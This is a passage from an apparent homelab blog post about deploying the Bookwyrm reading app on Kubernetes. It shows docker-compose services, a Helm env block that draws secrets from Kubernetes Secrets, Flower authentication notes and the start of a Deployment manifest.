</span></span><span style="display:flex;"><span>  <span style="color:#f92672">pgdata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">static_volume</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">media_volume</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">exports_volume</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">redis_broker_data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">redis_activity_data</span>:
</span></span><span style="display:flex;"><span><span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">main</span>:
</span></span></code></pre></div><p>It&rsquo;s a pretty long one, so let&rsquo;s go through one-by-one. I skipped the Nginx
deployment entirely, as I&rsquo;m using Bookwyrm&rsquo;s S3 support for static assets and
images, and with that, the Nginx deployment doesn&rsquo;t seem to be necessary. For the
same reason, I also don&rsquo;t have any volumes for <code>/app/static</code> and <code>/app/images</code>.
I initially had volumes there, as the docs were not 100% clear whether the
directories might still be used even with S3, but after a couple of days of
running Bookwyrm, I found them to still be empty and removed the volumes. I also
ignored the <code>dev-tools</code> service, as that also seemed to be unnecessary. I also
skipped the <code>redis_activity</code> and <code>redis_broker</code> services as well as the <code>db</code>
service, as I already created those by using CloudNativePG and my existing Redis
instance.</p>
<p>That left me with the following services to run:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">services</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">web</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">build</span>: <span style="color:#ae81ff">.</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env_file</span>: <span style="color:#ae81ff">.env</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">command</span>: <span style="color:#ae81ff">python manage.py runserver 0.0.0.0:8000</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">.:/app</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">static_volume:/app/static</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">media_volume:/app/images</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">exports_volume:/app/exports</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">db</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">celery_worker</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">redis_activity</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#34;8000&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">celery_worker</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env_file</span>: <span style="color:#ae81ff">.env</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">build</span>: <span style="color:#ae81ff">.</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">command</span>: <span style="color:#ae81ff">celery -A celerywyrm worker -l info -Q high_priority,medium_priority,low_priority,streams,images,suggested_users,email,connectors,lists,inbox,imports,import_triggered,broadcast,misc</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">.:/app</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">static_volume:/app/static</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">media_volume:/app/images</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">exports_volume:/app/exports</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">db</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">redis_broker</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">restart</span>: <span style="color:#66d9ef">on</span>-<span style="color:#ae81ff">failure</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">celery_beat</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env_file</span>: <span style="color:#ae81ff">.env</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">build</span>: <span style="color:#ae81ff">.</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">command</span>: <span style="color:#ae81ff">celery -A celerywyrm beat -l INFO --scheduler django_celery_beat.schedulers:DatabaseScheduler</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">.:/app</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">static_volume:/app/static</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">media_volume:/app/images</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">exports_volume:/app/exports</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">celery_worker</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">restart</span>: <span style="color:#66d9ef">on</span>-<span style="color:#ae81ff">failure</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">flower</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">build</span>: <span style="color:#ae81ff">.</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">command</span>: <span style="color:#ae81ff">celery -A celerywyrm flower --basic_auth=${FLOWER_USER}:${FLOWER_PASSWORD} --url_prefix=flower</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env_file</span>: <span style="color:#ae81ff">.env</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">.:/app</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">static_volume:/app/static</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">db</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">redis_broker</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">restart</span>: <span style="color:#66d9ef">on</span>-<span style="color:#ae81ff">failure</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">main</span>:
</span></span></code></pre></div><p>One thing to note is that they all use the same <code>.env</code> file, and Bookwyrm&rsquo;s stack
is mostly configured via environment variables, which I applaud. So to not have
to copy the env for each container, I added this section to my <code>values.yaml</code> file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">POD_IP</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">fieldRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fieldPath</span>: <span style="color:#ae81ff">status.podIP</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">DEBUG</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;false&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ALLOWED_HOSTS</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;bookwyrm.example.com,localhost,$(POD_IP)&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">SECRET_KEY</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">secret-key</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">key</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">DOMAIN</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;bookwyrm.example.com&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">USE_HTTPS</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">PGPORT</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">port</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">POSTGRES_PASSWORD</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">password</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">POSTGRES_USER</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">user</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">POSTGRES_DB</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">dbname</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">POSTGRES_HOST</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">REDIS_ACTIVITY_URL</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;redis://redis.redis.svc.cluster.local:6379/0&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">REDIS_BROKER_URL</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;redis://redis.redis.svc.cluster.local:6379/1&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FLOWER_USER</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">flower</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">user</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FLOWER_PASSWORD</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">flower</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">pw</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FLOWER_BASIC_AUTH</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;$(FLOWER_USER):$(FLOWER_PASSWORD)&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FLOWER_PORT</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;8888&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">EMAIL_HOST</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;mail.example.com&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">EMAIL_PORT</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;465&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">EMAIL_HOST_USER</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;bookwyrm@example.com&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">EMAIL_HOST_PASSWORD</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">mail-pw</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">pw</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">EMAIL_SENDER_NAME</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;bookwyrm&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">EMAIL_SENDER_DOMAIN</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;example.com&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">USE_S3</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">AWS_ACCESS_KEY_ID</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-bucket</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AWS_ACCESS_KEY_ID</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">AWS_SECRET_ACCESS_KEY</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-bucket</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AWS_SECRET_ACCESS_KEY</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">AWS_STORAGE_BUCKET_NAME</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">configMapKeyRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-bucket</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">BUCKET_NAME</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">AWS_S3_CUSTOM_DOMAIN</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;s3-bookwyrm.example.com&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">AWS_S3_ENDPOINT_URL</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;http://rook-ceph-rgw-rgw-bulk.rook-cluster.svc&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ENABLE_THUMBNAIL_GENERATION</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span></code></pre></div><p>I won&rsquo;t go through all of the options, but there are a few I would like to highlight.
First, the <code>POD_IP</code> setting is important for Kubernetes probes to work. They will
by default access the pod via its IP, and that IP needs to be specifically allowed
for Django apps. I&rsquo;ve had a similar issue with <a href="https://docs.paperless-ngx.com/">Paperless-ngx</a>
before, which is also a Django app.</p>
<p>Another one is the flower auth:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FLOWER_USER</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">flower</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">user</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FLOWER_PASSWORD</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">flower</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">pw</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FLOWER_BASIC_AUTH</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;$(FLOWER_USER):$(FLOWER_PASSWORD)&#34;</span>
</span></span></code></pre></div><p>In the docker-compose example from Bookwyrm, the credentials are provided on
the command line:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  <span style="color:#f92672">flower</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">build</span>: <span style="color:#ae81ff">.</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">command</span>: <span style="color:#ae81ff">celery -A celerywyrm flower --basic_auth=${FLOWER_USER}:${FLOWER_PASSWORD} --url_prefix=flower</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env_file</span>: <span style="color:#ae81ff">.env</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">.:/app</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">static_volume:/app/static</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">db</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">redis_broker</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">restart</span>: <span style="color:#66d9ef">on</span>-<span style="color:#ae81ff">failure</span>
</span></span></code></pre></div><p>I was never really able to get this working - for reasons I&rsquo;m unsure about but
probably have something to do with string escaping, I was not able to login with
my credentials. So I moved them to the <code>FLOWER_BASIC_AUTH</code> environment variable,
at which point they immediately started working.</p>
<p>With all of that out of the way, here is the Deployment:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">bookwyrm</span>
</span></span><span style="display:flex;"><span>      {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>      {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>      {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Recreate&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">bookwyrm</span>
</span></span><span style="display:flex;"><span>        {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>        {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>        {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">automountServiceAccountToken</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fsGroup</span>: <span style="color:#ae81ff">1000</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-web</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/homelab/bookwyrm:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>: [<span style="color:#e6db74">&#34;python&#34;</span>]
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;manage.py&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;runserver&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;0.0.0.0:{{ .Values.ports.web }}&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">200m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">500Mi</span>
</span></span><span style="display:flex;"><span>          {{- <span style="color:#ae81ff">with .Values.env }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            {{- <span style="color:#ae81ff">toYaml . | nindent 11 }}</span>
</span></span><span style="display:flex;"><span>          {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">livenessProbe</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">httpGet</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.web }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;/&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">initialDelaySeconds</span>: <span style="color:#ae81ff">15</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">periodSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-http</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.web }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-celery-worker</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/homelab/bookwyrm:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>: [<span style="color:#e6db74">&#34;celery&#34;</span>]
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-A&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;celerywyrm&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;worker&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-l&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;info&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-Q&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;high_priority,medium_priority,low_priority,streams,images,suggested_users,email,connectors,lists,inbox,imports,import_triggered,broadcast,misc&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">200m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">200Mi</span>
</span></span><span style="display:flex;"><span>          {{- <span style="color:#ae81ff">with .Values.env }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
